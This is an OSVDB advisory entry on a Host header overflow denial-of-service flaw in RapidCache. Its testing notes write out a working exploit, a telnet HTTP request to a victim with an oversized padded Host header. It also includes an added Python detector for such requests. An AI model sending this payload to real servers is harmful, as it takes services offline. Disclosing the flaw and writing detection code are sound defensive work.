RapidCache Host Header Overflow DoS

2004-01-15T06:09:52
ID OSVDB:3553
Type osvdb
Reporter OSVDB
Modified 2004-01-15T06:09:52

Description

Vulnerability Description

RapidCache contains a flaw that may allow a remote denial of service. The issue is triggered when an overly long "Host:" header is supplied, and will result in loss of availability for the service.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

telnet [victim] 80

GET / HTTP/1.1
Accept: /..
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
Host: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb bbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc cccccddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeBBBBXXX X:8080
Connection: Keep-Alive
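An added example, not part of the OSVDB entry or the vendor's code: a Python check that flags requests like the one above by measuring the Host header after unfolding continuation lines, so a value wrapped across several lines is still counted whole. The 259-byte limit (253-byte DNS name, colon, 5-digit port), the function names and the sample requests are assumptions constructed for illustration.

```python
import re

# Assumption: longest legitimate host[:port] = 253-byte DNS name + ":" + 5-digit port.
MAX_HOST_LEN = 253 + 1 + 5
# Hostname or bracketed IPv6 literal, optionally followed by a port.
HOST_RE = re.compile(rb"(\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9.-]+)(:\d{1,5})?")

def host_values(raw: bytes) -> list:
    """Return every Host header value in the request head, with folded lines joined."""
    head = raw.replace(b"\r\n", b"\n").split(b"\n\n", 1)[0]
    lines = []
    for line in head.split(b"\n")[1:]:            # skip the request line
        if line[:1] in (b" ", b"\t") and lines:   # continuation of the previous header
            lines[-1] += b" " + line.strip()
        else:
            lines.append(line)
    values = []
    for line in lines:
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"host":
            values.append(value.strip())
    return values

def check_request(raw: bytes) -> list:
    """Return a list of findings; an empty list means the Host header looks sane."""
    hosts = host_values(raw)
    findings = []
    if len(hosts) > 1:
        findings.append("multiple Host headers")
    for host in hosts:
        if len(host) > MAX_HOST_LEN:
            findings.append(f"Host header too long ({len(host)} bytes)")
        elif not HOST_RE.fullmatch(host):
            findings.append("Host header has unexpected characters")
    return findings

# Constructed sample requests (not captured traffic).
NORMAL = b"GET / HTTP/1.1\r\nHost: cache.example.test:8080\r\nConnection: Keep-Alive\r\n\r\n"
LONG = (b"GET / HTTP/1.1\r\nUser-Agent: Mozilla/4.0\r\nHost: " + b"a" * 600 +
        b":8080\r\nConnection: Keep-Alive\r\n\r\n")
# Each physical line is under the limit; only the unfolded value exceeds it.
FOLDED = b"GET / HTTP/1.1\r\nHost: " + b"a" * 200 + b"\r\n " + b"a" * 200 + b":8080\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("normal", NORMAL), ("long", LONG), ("folded", FOLDED)):
        print(label, check_request(req))
```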

References:

Vendor URL: http://www.vicomsoft.com/rapidcache/rapidcache.main.html
Secunia Advisory ID: 10650
Related OSVDB ID: 3554
Other Advisory URL: http://www.elitehaven.net/rapidcache.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-01/0116.html
ISS X-Force ID: 14834
Bugtraq ID: 9427